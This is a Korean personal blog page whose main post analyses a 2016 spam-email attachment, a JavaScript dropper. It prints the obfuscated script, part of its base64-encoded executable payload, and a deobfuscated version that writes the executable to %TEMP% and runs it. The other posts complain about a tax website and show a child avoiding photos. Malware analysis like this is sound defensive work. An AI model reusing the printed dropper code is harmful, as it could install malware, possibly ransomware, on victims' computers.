• Home
  • Tag
  • LocationLog
  • Guestbook
  • Admin
  • Write
블로그 이미지

감사합니다.

안녕1999

카테고리

전체 (3067)
자바스크립트 (20)
안드로이드 (14)
WebGL (4)
변비 (17)
정치,경제 (35)
C언어,ARM (162)
컴퓨터(PC, Note Book, 윈.. (41)
전자회로, PCB (27)
유머,안웃긴,GIF,동영상 (118)
국부론60 (71)
모듈(PCB) (3)
건강 (2)
FreeCAD (25)
PADS (43)
퇴직,퇴사,구직,취업 활동 (3)
C# (86)
엑셀 (8)
워드 (0)
LabView (6)
레고 (30)
FPGA (0)
Total
Today
Yesterday
Tistory 로고 이미지 티스토리 가입하기!
태그 : 지역로그
방명록 : 관리자 : 글쓰기
Blog is powered
by Daum /
Designed by Tistory
RSS FEED

달력

« » 2025.5
일 월 화 수 목 금 토
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31

공지사항

태그목록

  • 문제
  • 프로그램
  • 문재인
  • 대통령
  • 이유
  • XP
  • C
  • 개발
  • GCC
  • 핸드폰
  • 정부
  • 윈도우
  • 옥션
  • 자바스크립트
  • 레고
  • 광고
  • 에러
  • 개선
  • 제천
  • 매실
  • arm
  • 공무원
  • 방법
  • pcb
  • 갤럭시
  • 맛집
  • 경제
  • 어린이
  • 비교
  • 안드로이드

최근에 올라온 글

'짜증'에 해당되는 글 4건

  1. 2016.07.23 스펨 메일의 정체 분석
  2. 2016.07.15 위텍스(www.wetax.go.kr)
  3. 2016.06.25 사진찍히기 싫어하는 어린이
  4. 2016.06.19 위택스 - https://www.wetax.go.kr/

스펨 메일의 정체 분석

카테고리 없음 / 2016. 7. 23. 01:00

요즘 회사메일로 스펨메일이 많이 오고 있다.

스펨등록을 해도 소용이 없다. 매번 다른 메일주소로 날라오니...


너무 많이 오는통에, 짜증이나서,

이 쓰레기같은 메일이 무엇인지 분석해보았다.


첨부파일은 압축파일이며,

압축파일 안에는 자바스크립트 파일이 들어 있다.


자바스크립트파일은 메모장에서도 편집이 가능하다.

var ZYb = " 321" + "";

var KXi6 = "Run" + "";

var Ts = "in" + "";

var Gf9 = ".b" + "";

var Nk2 = "xe" + "";

var ZQl = ".e" + "";

function YPp4(Qp){return Qp;};var FGi3 = "l" + "";

var Pg6 = "ESv" + "";

var ELz = "K2DPj" + "";

function Fw5(NGi){return NGi;};var Yh7 = "%/" + "";

var PEl = "MP" + "";

var Hm = "%TE" + "";

function So4(XUz3){return XUz3;};var Gj = "l" + "";

var Dv8 = "Shel" + "";

var Uq = "pt." + "";

var YBh = "WScri" + "";


(생략) 


var v_bin = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAA

Byd01o5gz0vfxXl3DacBcKAAAM9JWvsaeyBL39oHJffNj7F6LwjPS9/G5+91gzYvCMwVI5FEAM9L38YvC

/1g2uAgAAa8ARM8Mz21OJRfj/FeT4QAD/1ovw/9cD8P/Xi038A8YxRfgz0oHJu7fc0WoEWPfxM9K5fvyty

BACU9m57XofjjQQAzRZwFfGFRqjPA99A10Gx46PfQjQC4pdhO1VCPhWD///+4UtQ2Bf915I+FWP///+h

6iQ/g6MGH/OLHRxBbZ1XYj1SZ9grtGMkROxWRLV0V3b/XmTqmd0F86fNumVTqOJOjb15Ufh8rFM2OF


(생략) 

var WUc6          = 1
var BMd             = (8330 - 8330)
var VKb = (-6867 + 6869)
var WMg4          = (9211 - 9210)

function UBb2(Rl, Nh8) {
    var TYp = WScript[Op + Gu + Tz]((function Ex9(){return VAg;}()) + DNx2 + NLp + Ke5 + PQo8 + Ki + KDm6);
    var UQp = TYp[CYr + ALc + (function FSn(){return RCm6;}())](Rl);
    var Pe0 = UQp[GRq + GHc + TXp + (function XTm4(){return Gf;}())](WUc6, BMd);
    
    var Zn = WScript[SSz0(Op) + (function By(){return Gu;}()) + Tz](Pr + Km + Io + Cj + Sb + UTx);
    var KBc3 = Zn[AJc5 + Vi8 + ZOa2(Vk) + UGy](Ci0 + Gl + DUt8);
    KBc3[Vf + Vv] = "bin.base64";
    
    KBc3[AJh8] = Pe0[Ra9(RDj) + Io0(Za9)]();
    
    var CFt2 = WScript[Op + Gu + Tz](APa7 + Vi2 + (function OBc8(){return Oi8;}()) + JQd + WPi8(XTq));
    CFt2[AZl4] = WMg4;
    CFt2[YVm + (function LKz6(){return TPz;}())]();
    
    CFt2[FHb7 + EFk](KBc3[Lr4 + Gn4 + Px + Yy + WRr]);
    CFt2[Pw5 + Me + SPa2 + CBe](Nh8, VKb);
    
    Pe0[Mk]();
    CFt2[Mk]();
}


function Vx5(QFk, Nh8)
{
   var Og, NKj, QGj8
   var PDt2 = 31 - 30, AWl3 = 2;
   Og = new ActiveXObject(VAg + DNx2 + NLp + Ke5 + PQo8 + Ki + KDm6)
   NKj = Og[HXi5 + (function VPk1(){return Nb0;}()) + BIy3 + Kh4](Nh8, AWl3, true)
   NKj[FHb7 + EFk](QFk);
   NKj[Mk]();
   NKj = Og[Em9(HXi5) + Nb0 + BIy3 + Kh4](Nh8, PDt2);
   QGj8 = NKj[IBc + Yb1 + Nf8]();
   return(QGj8);
}

var EQl7=WScript[Op + OXk7(Gu) + Tz]((function WQg(){return YBh;}()) + Uq + Dv8 + So4(Gj));
var HHo3=EQl7.ExpandEnvironmentStrings(Hm + Fw5(PEl) + (function At(){return Yh7;}()));
var Gw5=HHo3 + ELz + YPp4(Pg6) + FGi3;
var RZh4=Gw5 + ZQl + Nk2;
var v_binpath=RZh4+Gf9+Ts;

try {
Vx5(v_bin, v_binpath);
UBb2(v_binpath, RZh4);
//EQl7[KXi6](RZh4 + ZYb);
}
catch (e) {WScript.Quit(1);};
WScript.Quit(0);



자바스크립트는 위와 같이 암호화 되어 있다.


var v_bin = "TVqQAAMAAAAEAAAA..."

이 내용은 Base64라는 코딩 방식이며, 내용물은 실행파일이 들어 있다.


스크립트문을 풀어보면


function Base64_to_bin_file(Rl, Nh8) {

    var TYp = WScript["CreateObject"]("Scripting.FileSystemObject");

    var UQp = TYp["GetFile"](Rl);

    var Pe0 = UQp["OpenAsTextStream"](1, 0);

    

    var Zn = WScript["CreateObject"]("MSXml2.DOMDocument");

    var KBc3 = Zn["createElement"]("Base64Data");

    KBc3["dataType"] = "bin.base64";

    

    KBc3["text"] = Pe0["ReadAll"]();

    

    var CFt2 = WScript["CreateObject"]("ADODB.Stream");

    CFt2["Type"] = 1;

    CFt2["Open"]();

    

    CFt2["Write"](KBc3["nodeTypedValue"]);

    CFt2["SaveToFile"](Nh8, 2);

    

    Pe0["Close"]();

    CFt2["Close"]();

}



function Create_K2DPjESvl_exe(QFk, Nh8)

{

   var Og, NKj, QGj8

   Og = new ActiveXObject("Scripting.FileSystemObject")

   NKj = Og["OpenTextFile"](Nh8, 2, true)

   NKj["Write"](QFk);

   NKj["Close"]();

   NKj = Og["OpenTextFile"](Nh8, 1);

   QGj8 = NKj["ReadLine"]();

   return(QGj8);

}


var EQl7=WScript["CreateObject"]("WScript.Shell");


var v_binpath=EQl7.ExpandEnvironmentStrings("%TEMP%/") + "K2DPjESvl.exe.bin";


try {

Create_K2DPjESvl_exe(v_bin, v_binpath);

Base64_to_bin_file(v_binpath, EQl7.ExpandEnvironmentStrings("%TEMP%/") + "K2DPjESvl.exe");

EQl7["Run"](EQl7.ExpandEnvironmentStrings("%TEMP%/") + "K2DPjESvl.exe 321");

}

catch (e) {WScript.Quit(1);};

WScript.Quit(0); 


위와 같이 아주 간단한 내용이다.


var v_bin = "TVqQAAMAAAAEAAAA..."

이내용을 파일로 저장하고, 다시 읽어서, Base64로 실행파일로 저장한 다음, 실행한다.


메일을 받은 사람이 자바스크립트 파일을 열어보는 순간, 자바스크립트가 실행되어,

실행파일을 생성하고, 실행파일을 동작시킨다.


(메모장으로 열때는 편집만 된다. 실행은 안된다.)

그러나 실수로, 인터넷 익스플로어로 열게되면, 자바스크립트가 실행된다.


실행파일의 내용은 시간관계상 분석 못한다.

관심있는분이 분석해주시면 감사하겠습니다.


INV000 b1a7.js(바이러스).zip


위 파일에는 내가 메일로 받은 파일이 들어있다.

안전을 위해, 파일확장자를 txt로 바꾸었으니, 실행되지는 않는다.

또한, 안전을 위해, 실행파일을 실행하는 명령은 주석처리가 되어 있다.

받아서, 메모장으로 열어봐도 문제는 없다.



보나마나 뻔한게, 랜섬웨어일 가능성이 높다.

요즘 돈되는건 랜섬웨어가 최고이니...


랜섬웨어는 하드디스크의 파일을 암호화시키고, 돈을 요구하는 프로그램이다.

돈 안주면, 파일 복구못한다.



마지막 실행문장은 제거후, 자바스크립트를 실행해서, 실행파일을 생성했다.

실행파일은 %TEMP%폴더에 생성된다.

윈도우 탐색기 주소창에 넣으면, 해당 폴더로 이동한다.


실행파일의 정보는 위와 같다.




실행파일이 사용하는 함수는 위와 같다. 177k의 비교적 작은 크기임에도, 온갖 종류의 기능은 다 사용하는듯 하다.

아마, 한번 실행되면, 여기저기 복사본을 만들듯 싶다.

스펨광고창부터, 랜섬웨어 기능까지...(추측)



Logo

www.hybrid-analysis.com

멜웨어, 바이러스등을 무료로, 자동으로 분석해주는 사이트이다.

분석결과는 "잘 모르겠음" ㅎㅎ(예상한대로)


https://www.hybrid-analysis.com/sample/0ae741fbcae6fb5af7bdec6e8219d02b522e74ac20906703b2573e14d1101252?environmentId=100


가상PC에서 직접 실행하면서 분석하기도 하나봅니다.


프로그램이라는게, 실행파일이 되면, 기계어코드만 남기때문에, 해당 코드가 무슨 목적으로 동작하는지 분석하기는 쉽지 않습니다.

해당 프로그램이 어떤 함수들을 호출하더라...는 정보로, 대충, 이럴것이다.

좀더 의심이 가면, 하나씩 분석을하게되면, 시간이 상당히 오래걸립니다.


제거 보기에는 이 프로그램은 암호화 기능을 사용해서, 랜덤하게 프로그램 코드를 생성하는듯 싶습니다.

그래야 백신프로그램도 잘 못잡거든요.


어쨌든, 전 시간이 없어, 더이상은 못합니다.


관심있으신분들 한번 분석해보시기 바랍니다.




  1. 안랩 랜섬웨어예방 - ahnlab.com‎

    광고www.ahnlab.com/‎
    최신 랜섬웨어 정보부터 피해 예방 가이드, 전용 백신까지!
    한국을 목표로 한 랜섬웨어, CryptoLocker 상세정보

검색결과

랜섬웨어에 대한 이미지 검색결과
랜섬웨어에 감염되어 암호화 된 파일은 복호화 키가 없으면 복구가 불가능하다. 따라서 중요한 사용자 문서나 데이터들은 물리적으로 분리된 저장소에 정기적으로 백업해두는 습관을 길러 악성코드에 감염되더라도 피해를 최소화 할 수 있도록 해야 한다.2015. 11. 4.

[보안정보] 알기 쉬운 랜섬웨어 - Anti-Virus Leader ViRobot

www.hauri.co.kr/information/notice_view.html?intSeq=179&page=1
사용자 의견
이 결과에 관한 정보 • 

랜섬웨어 - 나무위키

https://namu.wiki/w/랜섬웨어
주의: 혹시 이 문서에 들어오신 분 중, 랜섬웨어에 감염되신 분이 있다면 당장 PC를 강제종료하고 모바일로 보시길 바랍니다! 컴퓨터를 계속 켜 두고 있으면 아직 ...

안랩 랜섬웨어 보안센터 | AhnLab

www.ahnlab.co.kr/kr/site/securityinfo/ransomware/index.do
랜섬웨어 피해가 확산되고 있어 각별한 주의가 필요합니다. 안랩은 랜섬웨어 동향과 피해 예방을 위한 보안 가이드를 드립니다.

[정보보호]걸리면 끝(?) 랜섬웨어...이렇게 하면 막는다 - 대한민국 IT포털 ...

www.etnews.com/20151108000034
2015. 11. 8. - PC에 저장된 사진, 동영상, 문서 파일을 인질로 잡는 랜섬웨어 피해가 급증했다. 랜섬웨어에 걸리면 이같은 메시지가 나타난다. (자료:알약블로그) ...

랜섬웨어 관련 이미지이미지 신고
랜섬웨어에 대한 이미지 검색결과
랜섬웨어에 대한 이미지 검색결과
랜섬웨어에 대한 이미지 검색결과
랜섬웨어에 대한 이미지 검색결과
랜섬웨어에 대한 이미지 검색결과
랜섬웨어에 대한 이미지 더보기

[보안정보] 알기 쉬운 랜섬웨어 - Anti-Virus Leader ViRobot

www.hauri.co.kr › 보안정보 › 보안공지
2015. 11. 4. - 랜섬웨어는 ransom(몸값)과 ware(제품)의 합성어로 컴퓨터 사용자의 PC나 문서를 '인질'로 잡고 돈을 요구한다고 해서 붙여진 명칭이다. 1989년 ...

뉴스
뉴스 검색결과의 이미지
"어떤 랜섬웨어나 해커도 침투 못 해"
Korea Daily‎ - 1일 전
'랜섬웨어'로 인한 피해가 연일 발생하는 등 컴퓨터 보안 문제가 심각한 사회문제로 대두하고 ...
랜섬웨어에 대한 뉴스 더보기

알약 공식 블로그 :: 랜섬웨어 'Crypt0L0cker'주의! - 알약(Alyac)

blog.alyac.co.kr/305
2015. 4. 21. - 이번에 발견된 랜섬웨어는 드라이브 바이 다운로드 형식으로 유포되고 있습니다. 드라이브 바이 다운로드는 OS 및 SW의 보안취약점을 통해 변조된 ...

랜섬웨어 제거 | 랜섬웨어란 무엇입니까 | Microsoft 보안

https://www.microsoft.com/ko-kr/security/.../ransomware-whatis.aspx
랜섬웨어란 무엇입니까? 랜섬웨어는 일종의 맬웨어 (악성 소프트웨어)로 사용자의 동의없이 해당 컴퓨터에 불법으로 설치됩니다. 불법으로 설치된 랜섬웨어로 해당 ...

한국랜섬웨어침해대응센터

https://www.rancert.com/
랜섬웨어진단/보안컨설팅, 침해사고접수/신고, 각종 피해사례 및 대응 방법 제공.

랜섬웨어 대응센터 - 한국트렌드마이크로

www.trendmicro.co.kr/kr/security-intelligence/ransomware/
트렌드마이크로 랜섬웨어 대응 솔루션. [기업] 이메일 탐지 및 차단 Deep Discovery Email Inspector. 새롭게 출현하는 랜섬웨어의 90% 이상은 피해자들의 이메일을 ..


저작자표시 비영리 변경금지
Posted by 안녕1999
, |

위텍스(www.wetax.go.kr)

카테고리 없음 / 2016. 7. 15. 08:13

홈페이지는 여기로 =>> 위텍스(www.wetax.go.kr)


오늘도 제 믿음(?)을 져버리지는 않는군요.

어제밤에 갑자기 아랫글 조회가 엄청나게 늘었더군요. 왠일인가 싶었는데, 재산세 내라고 메일 왔네요.

제가 쓴글 : 위택스 - https://www.wetax.go.kr/

로그인은 2번만에 성공.(먼가 이상하긴한데....)

조회도 잘되고,

어째, 잘된다 싶었는데,

납부가 안되네요.

납부창이 표시할 수 없다고 합니다.

헐....이걸 어째...

다른 납부방법도 없고,....

이번에도 인터넷 뱅킹으로 납부해야겠습니다. ㅠ ㅠ

납부화면 및에 의견수렴하는 기능이 생겼나보군요. (전에는 못본것 같은데)

이 기능은 잘했네요. 얼마나 빨리 처리될지는....

이럴거면, 

위택스 - https://www.wetax.go.kr/는 머하러 만들어서, 이중으로 세금낭비하는지....

그냥 없애고, 은행가서 납부하라고 하세요.....
이런 사이트 유지하는데, 세금이 얼나마 드는지 궁금하군요.
일자리 늘리는건 좋지만, 좀 되야, 잔소리도 안나오죠.
1년에 몇번 올때마다, 짜증 폭발...

인터넷뱅킹은 한번에 납부 완료.
역시, 공공기관의 일처리는 엉망입니다....

제가 죽기전에, 좀 개선되길 바랍니다....씁쓸.....



저작자표시 비영리 변경금지
Posted by 안녕1999
, |

사진찍히기 싫어하는 어린이

카테고리 없음 / 2016. 6. 25. 00:29
엄마가 사진찍게 포즈좀 취해봐라.

생각중인 어린이

거부하는 어린이

딴짓하는 어린이

짜증난 어린이

한숨쉬는 어린이

모델료도 안주면서....
저작자표시 비영리 변경금지
Posted by 안녕1999
, |

위택스 - https://www.wetax.go.kr/

카테고리 없음 / 2016. 6. 19. 05:30

https://www.wetax.go.kr/


6월 자동차세(지방세) 납부하라고, 메일도 오고, 문자메세지도 오고,

납부하러 들어갔더니...

항상 느끼는거지만, 참 ㅈㄹ같이 만들어놨네...


공인인증서 1년 지나서 새걸로 교체했더니, 등록안됬다고, 이름넣고, 다시 재등록하는데

공인인증서 창이 3번인가 뜨더라.

그냥 한번만 뜨게 해달라고....방금전에 입력한거 또 입력하고 또입력하고...

그러고 또 로그인하라고??

매번 이러니, 그냥 이러는줄 안다. 에휴..


공인인증서 바뀌었다고, 다시 등록하라니...

공인인증서 주인도 못알아보냐??

머하러 만든건지 참나...


나의 위택스 들어가서 조회하니 지방세 1건 나온다.

(이건 참 잘해놨다.)

근데, 지방세 들어가서 또 조회해야한다.

...

참나...그냥 보여달라고...

멀그리 조회하는걸 좋아하는지...

자꾸 이러니깐 열받는거다.


로그인하면, 납부내역부터 보여주고,

일괄 납부버튼 누르면, 바로 납부하게 만들어야지...

나이든 컴맹은 인터넷 납부도 못하것다...


관공서 홈페이지는 돈으로 쳐발랐을텐데, 왜이리 엉망인지 모르겠다.

제대로 만들었는지 검사해주는 사람이 없어서 그런가?

"어차피 이래나, 저래나, 알아서 내겠지..." 이생각이겠지...


다시 정리하면,


1. 로그인하면

2. 납부할 목록 보여줘

3. 버튼 눌러서 바로 납부하게 해줘.


좀 간단하게 합시다.



------------


어쨌든 장바구니에 넣어서, 통합납부를 누르는 순간, 3개의 프로그램을 또 설치해야 한다.

(짜증 폭발)



다운로드, 설치하고, 다시 카드 납부하니,

알 수없는 창이 뜬다.

이거 납부가 됐다는거야? 안됐다는거야?

YES or NO ???

여기서 또 한방 맞네...헐...


그냥 인터넷뱅킹으로 낼께요.....참나...



은행가서 또 보안프로그램 설치하고,



통합공과금에서 조회하니, 오류가 뜬다.

머야??

먼 소리인지 모르겠구만...

관공서나 은행이나...에휴...


화병나서 돌아가시겠다...

다음부터는 그냥 은행에 걸어가서 낼까? 운동도 할겸???


지방세 메뉴 찾아서 조회해서 납부는 했다.


거참 더럽게 힘들구만...돈 내겠다는데....정말...




저작자표시 비영리 변경금지
Posted by 안녕1999
, |
«이전 1 다음»

최근에 달린 댓글

글 보관함

링크

티스토리툴바

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.